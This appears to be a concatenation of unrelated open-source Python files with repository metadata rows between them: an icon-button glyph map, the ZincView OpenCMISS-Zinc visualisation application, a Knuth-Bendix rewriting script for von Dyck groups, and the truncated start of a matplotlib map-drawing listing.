'sound-dolby' : u'\ue190',
'sound-5-1' : u'\ue191',
'sound-6-1' : u'\ue192',
'sound-7-1' : u'\ue193',
'copyright-mark' : u'\ue194',
'registration-mark' : u'\ue195',
'cloud-download' : u'\ue197',
'cloud-upload' : u'\ue198',
'tree-conifer' : u'\ue199',
'tree-deciduous' : u'\ue200',
'cd' : u'\ue201',
'save-file' : u'\ue202',
'open-file' : u'\ue203',
'level-up' : u'\ue204',
'copy' : u'\ue205',
'paste' : u'\ue206',
'alert' : u'\ue209',
'equalizer' : u'\ue210',
'king' : u'\ue211',
'queen' : u'\ue212',
'pawn' : u'\ue213',
'bishop' : u'\ue214',
'knight' : u'\ue215',
'baby-formula' : u'\ue216',
'tent' : u'\u26fa',
'blackboard' : u'\ue218',
'bed' : u'\ue219',
'apple' : u'\uf8ff',
'erase' : u'\ue221',
'hourglass' : u'\u231b',
'lamp' : u'\ue223',
'duplicate' : u'\ue224',
'piggy-bank' : u'\ue225',
'scissors' : u'\ue226',
'bitcoin' : u'\ue227',
'btc' : u'\ue227',
'xbt' : u'\ue227',
'yen' : u'\u00a5',
'jpy' : u'\u00a5',
'ruble' : u'\u20bd',
'rub' : u'\u20bd',
'scale' : u'\ue230',
'ice-lolly' : u'\ue231',
'ice-lolly-tasted' : u'\ue232',
'education' : u'\ue233',
'option-horizontal' : u'\ue234',
'option-vertical' : u'\ue235',
'menu-hamburger' : u'\ue236',
'modal-window' : u'\ue237',
'oil' : u'\ue238',
'grain' : u'\ue239',
'sunglasses' : u'\ue240',
'text-size' : u'\ue241',
'text-color' : u'\ue242',
'text-background' : u'\ue243',
'object-align-top' : u'\ue244',
'object-align-bottom' : u'\ue245',
'object-align-horizontal': u'\ue246',
'object-align-left' : u'\ue247',
'object-align-vertical' : u'\ue248',
'object-align-right' : u'\ue249',
'triangle-right' : u'\ue250',
'triangle-left' : u'\ue251',
'triangle-bottom' : u'\ue252',
'triangle-top' : u'\ue253',
'console' : u'\ue254',
'superscript' : u'\ue255',
'subscript' : u'\ue256',
'menu-left' : u'\ue257',
'menu-right' : u'\ue258',
'menu-down' : u'\ue259',
'menu-up' : u'\ue260'
}
self._icon_class = icon_class
caption = self.get_caption( icon_class )
Button.__init__(self, frame, caption)
def __repr__(self):
if hasattr(self, 'tag_name'):
return self.tag_name + ' icon'
if self._icon_class is None:
return ''
return self._icon_class + ' icon'
@property
def icon_class(self):
return self._icon_class
@icon_class.setter
def icon_class(self, icon_class):
self._icon_class = icon_class
caption = self.get_caption( icon_class )
self.text = caption
self.render()
def get_caption(self, class_name):
if class_name in self.classes:
return self.classes[class_name]
return self.classes['cd']
def _render(self, text):
self.text_surfaces, self.text_shadow_surfaces = [], []
#wants_shadows = (self.text_shadow_color is not None and
# self.text_shadow_offset is not None)
self.text_size = self._render_line(self._text, None)
def _render_line(self, line_text, wants_shadows):
#line_text = u'\u002a'
try:
text_surface = self.font.render(line_text, True, self.text_color)
self.text_surfaces.append(text_surface)
if wants_shadows:
text_shadow_surface = self.font.render(line_text, True, self.text_shadow_color)
self.text_shadow_surfaces.append(text_shadow_surface)
return text_surface.get_size()
except:
return (0,0)
"""
NavIconButton
"""
class NavIconButton(IconButton):
def __init__(self, frame, icon_class='cd', caption=''):
IconButton.__init__(self, frame, icon_class, caption)
"""
DialogButton
"""
class DialogButton(IconButton):
def __init__(self, frame, icon_class='cd', caption=''):
IconButton.__init__(self, frame, icon_class, caption)
| mit | -5,597,498,205,768,523,000 | 27.101449 | 83 | 0.514097 | false |
ABI-Software/ZincView | src/zincview.py | 1 | 30614 | #!/usr/bin/python
"""
ZincView example visualisation application using OpenCMISS-Zinc, python, Qt (PySide)
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
import os
import sys
import json
from PySide import QtGui, QtCore
from zincview_ui import Ui_ZincView
from opencmiss.zinc.context import Context as ZincContext
from opencmiss.zinc.scenecoordinatesystem import *
from opencmiss.zinc.result import RESULT_OK
from opencmiss.zinc.field import Field
def ZincRegion_getMeshSize(region, dimension):
'''
Get the number of elements of given dimension in the region and all its child regions.
:return meshSize
'''
fieldmodule = region.getFieldmodule()
mesh = fieldmodule.findMeshByDimension(dimension)
meshSize = mesh.getSize()
# recurse children
child = region.getFirstChild()
while child.isValid():
meshSize = meshSize + ZincRegion_getMeshSize(child, dimension)
child = child.getNextSibling()
return meshSize
def ZincRegion_getTimeRange(region):
'''
Recursively get the time range of finite element field parameters in region, or any child regions
:return minimum, maximum or None, None if no range
'''
minimum = None
maximum = None
# it's not easy to get the range of time; assume all nodes have same
# time range, and use timesequence from first node field with one.
# One problem is that often the last time represents the start of an
# increment, so the new range should be higher, which matters if animating
fieldmodule = region.getFieldmodule()
for fieldDomainType in [Field.DOMAIN_TYPE_NODES, Field.DOMAIN_TYPE_DATAPOINTS]:
nodeset = fieldmodule.findNodesetByFieldDomainType(fieldDomainType)
nodeiter = nodeset.createNodeiterator()
node = nodeiter.next()
if node.isValid:
fielditer = fieldmodule.createFielditerator()
field = fielditer.next()
while field.isValid():
feField = field.castFiniteElement()
if feField.isValid():
nodetemplate = nodeset.createNodetemplate()
nodetemplate.defineFieldFromNode(feField, node)
timesequence = nodetemplate.getTimesequence(feField)
if timesequence.isValid():
count = timesequence.getNumberOfTimes()
if count > 0:
thisMinimum = timesequence.getTime(1)
thisMaximum = timesequence.getTime(count)
if minimum is None:
minimum = thisMinimum
maximum = thisMaximum
elif thisMinimum < minimum:
minimum = thisMinimum
elif thisMaximum > maximum:
maximum = thisMaximum
field = fielditer.next()
# recurse children
child = region.getFirstChild()
while child.isValid():
thisMinimum, thisMaximum = ZincRegion_getTimeRange(child)
if thisMinimum is not None:
if minimum is None:
minimum = thisMinimum
maximum = thisMaximum
elif thisMinimum < minimum:
minimum = thisMinimum
elif thisMaximum > maximum:
maximum = thisMaximum
child = child.getNextSibling()
return minimum, maximum
class ZincView(QtGui.QMainWindow):
'''
Create a subclass of QMainWindow to get menu bar functionality.
'''
def __init__(self, parent=None):
'''
Initiaise the ZincView first calling the QWidget __init__ function.
'''
QtGui.QMainWindow.__init__(self, parent)
self._context = ZincContext("ZincView")
self._rootRegion = self._context.createRegion()
# set up standard materials and glyphs so we can use them elsewhere
materialmodule = self._context.getMaterialmodule()
materialmodule.defineStandardMaterials()
glyphmodule = self._context.getGlyphmodule()
glyphmodule.defineStandardGlyphs()
# Using composition to include the visual element of the GUI.
self.ui = Ui_ZincView()
self.ui.setupUi(self)
self.ui.toolBox.setCurrentIndex(0)
self.ui.sceneviewerwidget.setContext(self._context)
self.ui.sceneviewerwidget.graphicsInitialized.connect(self._graphicsInitialized)
self.setWindowIcon(QtGui.QIcon(":/cmiss_icon.ico"))
def _graphicsInitialized(self):
'''
Callback for when SceneviewerWidget is initialised
Set up additional sceneviewer notifiers for updating widgets
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
sceneviewer.setScene(self._rootRegion.getScene())
self.ui.sceneviewerwidget.setSelectModeAll()
self.ui.sceneviewer_editor_widget.setSceneviewer(sceneviewer)
self.allSettingsUpdate()
def modelClear(self):
'''
Clear all subregions, meshes, nodesets, fields and graphics
'''
msgBox = QtGui.QMessageBox()
msgBox.setWindowTitle("ZincView")
msgBox.setText("Clear will destroy the model and all graphics.")
msgBox.setInformativeText("Proceed?")
msgBox.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
msgBox.setDefaultButton(QtGui.QMessageBox.Cancel)
result = msgBox.exec_()
if result == QtGui.QMessageBox.Cancel:
return
self._rootRegion = self._context.createRegion()
self.ui.region_chooser.setRootRegion(self._rootRegion)
scene = self._rootRegion.getScene()
self.ui.scene_editor.setScene(scene)
self.ui.sceneviewerwidget.getSceneviewer().setScene(scene)
self.allSettingsUpdate()
def modelLoad(self):
'''
Read model file or run script to read or define model.
'''
fileNameTuple = QtGui.QFileDialog.getOpenFileName(self, "Load ZincView Model", "", "ZincView scripts (*.zincview.py);;Model Files (*.ex* *.fieldml)")
inputScriptFileName = fileNameTuple[0]
fileFilter = fileNameTuple[1]
if not inputScriptFileName:
return
#print("reading file " + inputScriptFileName + ", filter " + fileFilter)
# set current directory to path from file, to support scripts and fieldml with external resources
path = os.path.dirname(inputScriptFileName)
os.chdir(path)
if "scripts" in fileFilter:
try:
# f = open(inputScriptFileName, 'r')
# myfunctions = {}
# exec f in myfunctions
# success = myfunctions['loadModel'](self._rootRegion)
sys.path.append(path)
_, filename = os.path.split(inputScriptFileName)
mod_name, _ = os.path.splitext(filename)
import importlib.util
spec = importlib.util.spec_from_file_location(mod_name, inputScriptFileName)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
success = foo.loadModel(self._rootRegion)
except:
success = False
else:
result = self._rootRegion.readFile(inputScriptFileName)
success = (result == RESULT_OK)
if not success:
msgBox = QtGui.QMessageBox()
msgBox.setWindowTitle("ZincView")
msgBox.setText("Error reading file: " + inputScriptFileName)
msgBox.setStandardButtons(QtGui.QMessageBox.Ok)
msgBox.setDefaultButton(QtGui.QMessageBox.Cancel)
result = msgBox.exec_()
return
scene = self._rootRegion.getScene()
# ensure scene editor graphics list is redisplayed, and widgets are updated
self.ui.scene_editor.setScene(scene)
self.ui.region_chooser.setRootRegion(self._rootRegion)
self.allSettingsUpdate()
self.viewAll()
def toolBoxPageChanged(self, page):
# enable view widget updates only when looking at them
self.ui.sceneviewer_editor_widget.setEnableUpdates(page == 2)
def _displayReal(self, widget, value):
'''
Display real value in a widget
'''
newText = '{:.5g}'.format(value)
widget.setText(newText)
def _displayScaleInteger(self, widget, values, numberFormat = '{:d}'):
'''
Display vector of integer values in a widget, separated by '*'
'''
newText = "*".join(numberFormat.format(value) for value in values)
widget.setText(newText)
def _parseScaleInteger(self, widget):
'''
Return integer vector from comma separated text in line edit widget
'''
text = widget.text()
values = [int(value) for value in text.split('*')]
if len(values) < 1:
raise
return values
def allSettingsUpdate(self):
'''
Show initial values on widgets
'''
self.tessellationMinimumDivisionsDisplay()
self.tessellationRefinementFactorsDisplay()
self.tessellationCircleDivisionsDisplay()
self.spectrumMinimumDisplay()
self.spectrumMaximumDisplay()
self.timeMinimumDisplay()
self.timeMaximumDisplay()
self.timeTextDisplay()
self.timeSliderDisplay()
def regionChanged(self, int):
region = self.ui.region_chooser.getRegion()
self.ui.scene_editor.setScene(region.getScene())
def viewAll(self):
'''
Change sceneviewer to see all of scene.
'''
self.ui.sceneviewer_editor_widget.viewAll()
def _checkTessellationDivisions(self, minimumDivisions, refinementFactors, widget):
'''
Check total divisions not too high or get user confirmation
Call with both of the vectors set, each must have at least one component.
Returns True if can apply.
'''
limit = 100000 # max elements*totalsize for each dimension
min = 1
ref = 1
totalDivisions = [1,1,1]
totalSize3d = 1
for i in range(3):
if i < len(minimumDivisions):
min = minimumDivisions[i]
if i < len(refinementFactors):
ref = refinementFactors[i]
totalDivisions[i] = min*ref
totalSize3d = totalSize3d*min*ref
totalSize2d = totalDivisions[0]*totalDivisions[1]
if totalDivisions[1]*totalDivisions[2] > totalSize2d:
totalSize2d = totalDivisions[1]*totalDivisions[2]
if totalDivisions[2]*totalDivisions[0] > totalSize2d:
totalSize2d = totalDivisions[2]*totalDivisions[0]
totalSize1d = totalDivisions[0]
if totalDivisions[1] > totalSize1d:
totalSize1d = totalDivisions[1]
if totalDivisions[2] > totalSize1d:
totalSize1d = totalDivisions[2]
meshSize3d = ZincRegion_getMeshSize(self._rootRegion, 3)
limit3d = limit
if limit3d < meshSize3d:
limit3d = meshSize3d
overLimit3d = totalSize3d*meshSize3d > limit3d
meshSize2d = ZincRegion_getMeshSize(self._rootRegion, 2)
limit2d = limit
if limit2d < meshSize2d:
limit2d = meshSize2d
overLimit2d = totalSize2d*meshSize2d > limit2d
meshSize1d = ZincRegion_getMeshSize(self._rootRegion, 1)
limit1d = limit
if limit1d < meshSize1d:
limit1d = meshSize1d
overLimit1d = totalSize1d*meshSize1d > limit1d
if not (overLimit1d or overLimit2d or overLimit3d):
return True
widget.blockSignals(True)
msgBox = QtGui.QMessageBox()
msgBox.setWindowTitle("ZincView")
divisionsText = "*".join('{:d}'.format(value) for value in totalDivisions)
msgBox.setText("Fine tessellation divisions " + divisionsText + " can take a long time to apply.")
msgBox.setInformativeText("Please confirm action.")
msgBox.setStandardButtons(QtGui.QMessageBox.Apply | QtGui.QMessageBox.Cancel)
msgBox.setDefaultButton(QtGui.QMessageBox.Cancel)
result = msgBox.exec_()
widget.blockSignals(False)
return result == QtGui.QMessageBox.Apply
def tessellationMinimumDivisionsDisplay(self):
'''
Display the current tessellation minimum divisions
'''
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, minimumDivisions = tessellation.getMinimumDivisions(3)
self._displayScaleInteger(self.ui.tessellation_minimum_divisions_lineedit, minimumDivisions)
def tessellationMinimumDivisionsEntered(self):
'''
Set default tessellation minimum divisions from values in widget
'''
try:
minimumDivisions = self._parseScaleInteger(self.ui.tessellation_minimum_divisions_lineedit)
# pack to length 3 for comparing with old values
while len(minimumDivisions) < 3:
minimumDivisions.append(minimumDivisions[-1])
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, oldMinimumDivisions = tessellation.getMinimumDivisions(3)
if minimumDivisions != oldMinimumDivisions:
result, refinementFactors = tessellation.getRefinementFactors(3)
if self._checkTessellationDivisions(minimumDivisions, refinementFactors, self.ui.tessellation_minimum_divisions_lineedit):
if RESULT_OK != tessellation.setMinimumDivisions(minimumDivisions):
raise
except:
print("Invalid tessellation minimum divisions")
#self.tessellationMinimumDivisionsDisplay()
def tessellationRefinementFactorsDisplay(self):
'''
Display the current tessellation refinement factors
'''
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, refinementFactors = tessellation.getRefinementFactors(3)
self._displayScaleInteger(self.ui.tessellation_refinement_factors_lineedit, refinementFactors)
def tessellationRefinementFactorsEntered(self):
'''
Set default tessellation refinement factors from values in widget
'''
try:
refinementFactors = self._parseScaleInteger(self.ui.tessellation_refinement_factors_lineedit)
# pack to length 3 for comparing with old values
while len(refinementFactors) < 3:
refinementFactors.append(refinementFactors[-1])
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, oldRefinementFactors = tessellation.getRefinementFactors(3)
if refinementFactors != oldRefinementFactors:
result, minimumDivisions = tessellation.getMinimumDivisions(3)
if self._checkTessellationDivisions(minimumDivisions, refinementFactors, self.ui.tessellation_refinement_factors_lineedit):
if RESULT_OK != tessellation.setRefinementFactors(refinementFactors):
raise
except:
print("Invalid tessellation refinement factors")
#self.tessellationRefinementFactorsDisplay()
def tessellationCircleDivisionsDisplay(self):
'''
Display the current tessellation circle divisions
'''
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
circleDivisions = tessellation.getCircleDivisions()
self.ui.tessellation_circle_divisions_lineedit.setText(str(circleDivisions))
def tessellationCircleDivisionsEntered(self):
'''
Set tessellation circle divisions from values in widget
'''
try:
circleDivisions = int(self.ui.tessellation_circle_divisions_lineedit.text())
tessellationmodule = self._context.getTessellationmodule()
# set circle divisions for all tessellation in module
result = RESULT_OK
tessellationmodule.beginChange()
iter = tessellationmodule.createTessellationiterator()
tessellation = iter.next()
while tessellation.isValid():
result = tessellation.setCircleDivisions(circleDivisions)
if RESULT_OK != result:
break # can't raise here otherwise no call to endChange()
tessellation = iter.next()
tessellationmodule.endChange()
if RESULT_OK != result:
raise
except:
print("Invalid tessellation circle divisions")
#self.tessellationCircleDivisionsDisplay()
def perturbLinesStateChanged(self, state):
'''
Set perturb lines flag from checkbox
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
sceneviewer.setPerturbLinesFlag(state)
def spectrumAutorangeClicked(self):
'''
Set spectrum min/max to fit range of visible data in scene graphics.
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
scene = sceneviewer.getScene()
filter = sceneviewer.getScenefilter()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
result, minimum, maximum = scene.getSpectrumDataRange(filter, spectrum, 1)
if result >= 1: # result is number of components with range, can exceed 1
spectrummodule.beginChange()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
spectrumcomponent.setRangeMinimum(minimum)
spectrumcomponent.setRangeMaximum(maximum)
spectrummodule.endChange()
self.spectrumMinimumDisplay()
self.spectrumMaximumDisplay()
def spectrumMinimumDisplay(self):
'''
Display the current default spectrum minimum
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
minimum = spectrumcomponent.getRangeMinimum()
self._displayReal(self.ui.spectrum_minimum_lineedit, minimum)
def spectrumMinimumEntered(self):
'''
Set default spectrum minimum from value in the widget
'''
try:
minimum = float(self.ui.spectrum_minimum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
if RESULT_OK != spectrumcomponent.setRangeMinimum(minimum):
raise
except:
print("Invalid spectrum minimum")
self.spectrumMinimumDisplay()
def spectrumMaximumDisplay(self):
'''
Display the current default spectrum maximum
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
maximum = spectrumcomponent.getRangeMaximum()
self._displayReal(self.ui.spectrum_maximum_lineedit, maximum)
def spectrumMaximumEntered(self):
'''
Set default spectrum maximum from value in the widget
'''
try:
maximum = float(self.ui.spectrum_maximum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
if RESULT_OK != spectrumcomponent.setRangeMaximum(maximum):
raise
except:
print("Invalid spectrum maximum")
self.spectrumMaximumDisplay()
def spectrumAddColourBarClicked(self):
'''
Add an overlay graphics showing the default spectrum colour bar.
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
scene = sceneviewer.getScene()
scene.beginChange()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
glyphmodule = scene.getGlyphmodule()
glyphmodule.beginChange()
colourbar = glyphmodule.findGlyphByName("colourbar")
if not colourbar.isValid():
colourbar = glyphmodule.createGlyphColourBar(spectrum)
colourbar.setName("colourbar")
glyphmodule.endChange()
graphics = scene.findGraphicsByName("colourbar")
if graphics.isValid():
scene.removeGraphics(graphics)
graphics = scene.createGraphicsPoints()
graphics.setName("colourbar")
graphics.setScenecoordinatesystem(SCENECOORDINATESYSTEM_NORMALISED_WINDOW_FIT_LEFT)
pointattributes = graphics.getGraphicspointattributes()
pointattributes.setGlyph(colourbar)
pointattributes.setBaseSize([1.0,1.0,1.0])
pointattributes.setGlyphOffset([-0.9,0.0,0.0])
scene.endChange()
# ensure scene editor graphics list is redisplayed
self.ui.scene_editor.setScene(scene)
def timeAutorangeClicked(self):
'''
Set time min/max to time range of finite element field parameters.
'''
minimum, maximum = ZincRegion_getTimeRange(self._rootRegion)
if minimum is None:
minimum = 0.0
maximum = 0.0
timekeepermodule = self._context.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
timekeeper.setMinimumTime(minimum)
timekeeper.setMaximumTime(maximum)
self.timeMinimumDisplay()
self.timeMaximumDisplay()
currentTime = timekeeper.getTime()
if currentTime < minimum:
timekeeper.setTime(minimum)
elif currentTime > maximum:
timekeeper.setTime(maximum)
self.timeTextDisplay()
self.timeSliderDisplay()
def timeMinimumDisplay(self):
'''
Display the current default timekeeper minimum time
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
self._displayReal(self.ui.time_minimum_lineedit, minimum)
def timeMinimumEntered(self):
'''
Set default timekeeper minimum time from value in the widget
'''
try:
minimum = float(self.ui.time_minimum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
if RESULT_OK != timekeeper.setMinimumTime(minimum):
raise
except:
print("Invalid minimum time")
self.timeMinimumDisplay()
def timeMaximumDisplay(self):
'''
Display the current default timekeeper maximum time
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
maximum = timekeeper.getMaximumTime()
self._displayReal(self.ui.time_maximum_lineedit, maximum)
def timeMaximumEntered(self):
'''
Set default timekeeper maximum time from value in the widget
'''
try:
maximum = float(self.ui.time_maximum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
if RESULT_OK != timekeeper.setMaximumTime(maximum):
raise
except:
print("Invalid maximum time")
self.timeMaximumDisplay()
def timeTextDisplay(self):
'''
Display the default timekeeper current time
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
time = timekeeper.getTime()
self._displayReal(self.ui.time_text_lineedit, time)
def timeTextEntered(self):
'''
Set default timekeeper current time from value in the widget
'''
try:
time = float(self.ui.time_text_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
if RESULT_OK != timekeeper.setTime(time):
raise
self.timeSliderDisplay()
except:
print("Invalid current time")
self.timeTextDisplay()
def timeSliderDisplay(self):
'''
Display the default timekeeper current time on the time slider
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
time = timekeeper.getTime()
# don't want signal for my change
self.ui.time_slider.blockSignals(True)
if maximum != minimum:
value = int(time*(10000.999/(maximum - minimum)))
else:
value = 0
self.ui.time_slider.setValue(value)
self.ui.time_slider.blockSignals(False)
def timeSliderChanged(self, value):
'''
Set near clipping plane distance from slider
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
if maximum != minimum:
time = float(value)*((maximum - minimum)/10000.0)
else:
time = minimum
timekeeper.setTime(time)
self.timeTextDisplay()
def saveImageClicked(self):
'''
Save the view in the window to an image file.
'''
fileNameTuple = QtGui.QFileDialog.getSaveFileName(self, "Save image", "", "Image files (*.jpg *.png *.tif *.*)")
fileName = fileNameTuple[0]
if not fileName:
return
image = self.ui.sceneviewerwidget.grabFrameBuffer()
image.save(fileName)
def exportSceneViewersettings(self, outputPrefix, numberOfResources):
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
si = scene.createStreaminformationScene()
si.setIOFormat(si.IO_FORMAT_THREEJS)
si.setIODataType(si.IO_FORMAT_THREEJS)
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
time_enabled = 0
if (maximum - minimum) > 0.001:
time_enabled = 1
sv = self.ui.sceneviewerwidget.getSceneviewer()
sv.viewAll()
nearPlane = sv.getNearClippingPlane()
farPlane = sv.getFarClippingPlane()
result, eyePos, lookat, upVector = sv.getLookatParameters()
obj = { "nearPlane": nearPlane, "farPlane": farPlane, "eyePosition": eyePos, "targetPosition": lookat, "upVector": upVector, "numberOfResources": numberOfResources, "timeEnabled" : time_enabled}
outputName = outputPrefix + "_view.json"
export_f = open(outputName, "wb+")
export_f.write(json.dumps(obj))
export_f.close()
def exportScene(self, outputPrefix):
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
si = scene.createStreaminformationScene()
si.setIOFormat(si.IO_FORMAT_THREEJS)
si.setIODataType(si.IO_FORMAT_THREEJS)
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
if (maximum - minimum) > 0.0:
si.setInitialTime(minimum)
si.setFinishTime(maximum)
si.setNumberOfTimeSteps(51)
number = si.getNumberOfResourcesRequired()
i = 0
srs = []
while i < number:
outputName = outputPrefix + "_" + str(i + 1) + ".json"
srs.append(si.createStreamresourceFile(outputName))
i = i + 1
scene.exportScene(si)
return number
def saveWebGLClicked(self):
'''
Save the view in the window to WebGL content.
'''
fileNameTuple = QtGui.QFileDialog.getSaveFileName(self, "Specify prefix", "")
fileName = fileNameTuple[0]
if not fileName:
return
#print("reading file", fileName, ", filter", fileFilter)
# set current directory to path from file, to support scripts and fieldml with external resources
# Not implemented
numberOfResources = self.exportScene(fileName)
self.exportSceneViewersettings(fileName, numberOfResources)
# main start
def main(argv):
'''
The entry point for the application, handle application arguments and initialise the
GUI.
'''
app = QtGui.QApplication(argv)
w = ZincView()
w.show()
sys.exit(app.exec_())
# main end
if __name__ == '__main__':
main(sys.argv)
| mpl-2.0 | -1,349,197,757,580,551,200 | 40.822404 | 202 | 0.641471 | false |
dmishin/knuth_bendix | vondyck.py | 1 | 4552 | from knuth_bendix import knuthBendix, RewriteRuleset, shortLex
def vdRule(n, m, k=2):
"""Create initial ruleset for von Dyck group with inverse elements
https://en.wikipedia.org/wiki/Triangle_group#von_Dyck_groups
"""
return RewriteRuleset({
tuple('aA'): (),
tuple('Aa'): (),
tuple('bB'): (),
tuple('Bb'): (),
tuple('BA'*k): (),
tuple('ab'*k): (),
tuple( 'A'*n ): (),
tuple( 'a'*n ): (),
tuple( 'B'*m ): (),
tuple( 'b'*m ): () })
def vdNoInverse(n, m, k=2):
return RewriteRuleset({
tuple('ab'*k): (),
tuple( 'a'*n ): (),
tuple( 'b'*m ): () })
def groupPowers(s):
last = None
lastPow = None
for x in s:
if last is None:
last = x
lastPow = 1
else:
if x == last:
lastPow += 1
else:
yield last, lastPow
last = x
lastPow = 1
if last is not None:
yield last, lastPow
def groupedShortLex(s1, s2):
p1 = tuple(groupPowers(s1))
p2 = tuple(groupPowers(s2))
print ("####", s1,p1," <> ", s2,p2)
return shortLex( p1, p2)
def groupPowersVd(s):
for x, p in groupPowers(s):
if x.upper() == x:
yield x.lower(), -p
else:
yield x, p
def showGroupedPowers(s):
if not s: return "e"
return " ".join( (x if p == 1 else x+"^"+str(p))
for x, p in groupPowersVd(s))
def printVDRules(rules1):
print ("{")
for v,w in rules1._sortedItems():
print(" {sv}\t-> {sw}".format(sv = showGroupedPowers(v),
sw = showGroupedPowers(w)))
print ("}")
import itertools
def powers(n):
#powers from n // 2 to n//2-n, excluding 0
for a,b in itertools.zip_longest( range(1, n-n//2+1),
range(1, n//2+1)):
if a is not None: yield a
if b is not None: yield -b
def powerVondyck(n, m):
""" each element of double VD group is some power of the original VD elements.
powers are orderede from highest to lowest"""
elements = []
for p in reversed(list(powers(n))):
elements.append(('a', p))
for p in reversed(list(powers(m))):
elements.append(('b', p))
element2index = {e:i for i, e in enumerate(elements)}
a = element2index[('a', 1)]
ia = element2index[('a', -1)]
b = element2index[('b', 1)]
ib = element2index[('b', -1)]
def showElement(i):
a, p = elements[i]
return "%s^%s"%(a,p)
relations = {}
#generate identities.
# powers
for i1,(c1, p1) in enumerate(elements):
for i2, (c2, p2) in enumerate(elements):
if c1 != c2: continue
order = n if c1 == 'a' else m
ps = (p1 + p2 + order//2)%order - order //2
print ("#####", showElement(i1),"*",showElement(i2),"=",ps)
if ps == 0:
relations[(i1,i2)] = ()
else:
relations[(i1,i2)] = (element2index[(c1, ps)],)
# special identities:
# abab = e
# BABA = e
relations[(a,b,a,b)] = ()
relations[(ib,ia,ib,ia)] = ()
return RewriteRuleset(relations), showElement
if __name__=="__main__":
#rules = vdNoInverse( 4, 4)
import sys
try:
p = int(sys.argv[1])
q = int(sys.argv[2])
except IndexError:
print("Usage: vondyck p q")
exit(1)
print ("========== Rule for vD({p},{q},2) ==========".format(**locals()))
rules = vdRule(p, q)
showElem = str
#rules, showElem = powerVondyck(p, q)
def showProgress(i, s):
#print ("Iteration {i}, ruleset size: {n}".format(i=i,n=s.size()))
pass
rules1 = knuthBendix (rules, onIteration=showProgress, maxRulesetSize=10000)
for i,(v,w) in enumerate(rules1._sortedItems()):
print("{i:2}) {sv}\t-> {sw}".format(i=i+1,
sv = showGroupedPowers(v),
sw = showGroupedPowers(w)))
if True:
from automaton import *
automaton, initial_state = build_accepting_automaton( 'abAB', list(rules1.suffices()) )
#symbolic growth func
print("Growth function:")
func = automaton_growth_func(automaton, initial_state)
import sympy
func = sympy.cancel(func)
print(func)
| mit | -8,688,118,971,699,404,000 | 26.257485 | 95 | 0.491872 | false |
cgarrard/osgeopy-code | Chapter13/listing13_4.py | 1 | 1939 | # Script to draw world countries as patches.
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.path import Path
import matplotlib.patches as patches
from osgeo import ogr
def order_coords(coords, clockwise):
